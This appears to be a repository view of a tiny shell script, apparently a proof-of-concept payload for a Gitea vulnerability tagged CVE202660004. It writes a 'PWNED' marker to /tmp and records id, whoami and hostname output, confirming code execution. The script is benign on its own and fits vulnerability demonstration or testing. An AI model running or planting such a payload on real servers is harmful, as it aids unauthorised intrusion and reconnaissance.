7 lines
156 B
Bash
Executable File
7 lines
156 B
Bash
Executable File
#!/bin/sh
|
|
|
|
echo PWNED_by_CVE202660004 > /tmp/gitea_pwn_$(date +%s).txt
|
|
id >> /tmp/gitea_pwn.txt
|
|
whoami >> /tmp/gitea_pwn.txt
|
|
hostname >> /tmp/gitea_pwn.txt
|